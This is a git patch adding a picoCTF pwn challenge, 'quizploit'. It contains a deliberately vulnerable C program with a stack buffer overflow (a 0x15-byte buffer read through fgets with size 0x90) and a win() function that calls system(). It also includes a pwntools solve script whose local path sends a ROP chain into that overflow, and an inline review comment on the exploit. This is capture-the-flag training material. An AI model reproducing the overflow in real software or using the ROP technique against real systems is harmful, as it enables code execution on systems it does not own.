From 91c0fd7d662da34299ab047f3737165e5841d552 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Thu, 2 Jul 2026 07:27:35 +0900
Subject: [PATCH] pwn/quizploit

---
 pwn/quizploit/flag.txt | 1 +
 pwn/quizploit/solve.py | 70 +++++++++++++++++++++++++++++++++++++++++
 pwn/quizploit/vuln | Bin 0 -> 16136 bytes
 pwn/quizploit/vuln.c | 24 ++++++++++++++
 4 files changed, 95 insertions(+)
 create mode 100644 pwn/quizploit/flag.txt
 create mode 100755 pwn/quizploit/solve.py
 create mode 100755 pwn/quizploit/vuln
 create mode 100644 pwn/quizploit/vuln.c

diff --git a/pwn/quizploit/flag.txt b/pwn/quizploit/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/quizploit/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/quizploit/solve.py b/pwn/quizploit/solve.py
new file mode 100755
index 0000000..6f8b33d
--- /dev/null
+++ b/pwn/quizploit/solve.py
@@ -0,0 +1,70 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split()
+
+def conn() -> remote:
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def answers(r: remote) -> None:
+ print('Q1')
+ r.sendlineafter(b">> ", b"64-bit")
+ print('Q2')
+ r.sendlineafter(b">> ", b"dynamic")
+ print('Q3')
+ r.sendlineafter(b">> ", b"not stripped")
+ print('Q4')
+ r.sendlineafter(b">> ", b"0x15")
+ print('Q5')
+ r.sendlineafter(b">> ", b"0x90")
+ print('Q6')
+ r.sendlineafter(b">> ", b"yes")
+ print('Q7')
+ r.sendlineafter(b">> ", b"fgets")
+ print('Q8')
+ r.sendlineafter(b">> ", b"win")
+ print('Q9')
+ r.sendlineafter(b">> ", b"buffer overflow")
+ print('Q10')
+ r.sendlineafter(b">> ", hex(0x90 - 0x15).encode())
+ print('Q11')
+ r.sendlineafter(b">> ", b"NX")
+ print('Q12')
+ r.sendlineafter(b">> ", b"ROP")
+ print('Q13')
+ r.sendlineafter(b">> ", hex(exe.symbols['win']).encode())
+ print('Q14')
+ result = r.recvline_contains(b"picoCTF{").decode().strip()
+ print(result)
+ r.close()
+
+def main() -> None:
+
+ r = conn()
+ if args.REMOTE:
+ answers(r)
+ else:
+ offset = 40
+
+ rop = ROP(exe)
+ rop.raw(rop.generatePadding(0, offset))
+ rop.raw(rop.ret.address)
+ rop.win()
+ r.sendline(rop.chain())
+
+ print(r.recvall().decode(), end='')
+ r.close()
+
+if __name__ == "__main__":
+ main()
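Review bot: The local exploit path in `main()` sends `rop.chain()` straight into the target's `fgets(buffer, 0x90, stdin)`, but fgets stops at the first newline, so a 0x0a byte anywhere in the padding, the `ret` gadget address or `win`'s address would silently truncate the chain and the failure would likely be misread as a wrong offset; guard it with `payload = rop.chain()` / `assert b"\n" not in payload, "fgets() stops at newline"` / `r.sendline(payload)`. The `offset = 40` is also an unexplained magic number — presumably the 0x15-byte buffer padded to a 0x20 stack slot plus 8 bytes of saved rbp — so document it as `offset = 40  # 0x15-byte buffer padded to 0x20 + saved rbp; confirm with cyclic()`, and add a comment on the `rop.raw(rop.ret.address)` line saying the extra `ret` realigns the stack to 16 bytes before `win()` calls `system()`, since that is the only reason to insert it. The `recvline_contains(b"picoCTF{")` call in `answers()` blocks forever if the remote answers differently, so pass a `timeout=` or use `recvall` with a timeout. As a style point, the thirteen `print('Qn')`/`sendlineafter` pairs in `answers()` would read better as a loop over a list of answers using `log.info` rather than `print`.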
diff --git a/pwn/quizploit/vuln b/pwn/quizploit/vuln new file mode 100755 index 0000000000000000000000000000000000000000..41bc8d16acd98e17ae07cbad871fc122bf6236ab GIT binary patch literal 16136 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 +#include + +/* +This is not the challenge, just a template to answer the questions. +To get the flag, answer all the questions. +There are no bugs in the quiz. +There are 0xD questions in total. + +*/ + +void win(){ + system("cat flag.txt"); +} + +void vuln(){ + char buffer[0x15] = {0}; + fprintf(stdout, "\nEnter payload: "); + fgets(buffer, 0x90, stdin); +} + +void main(){ + vuln(); +}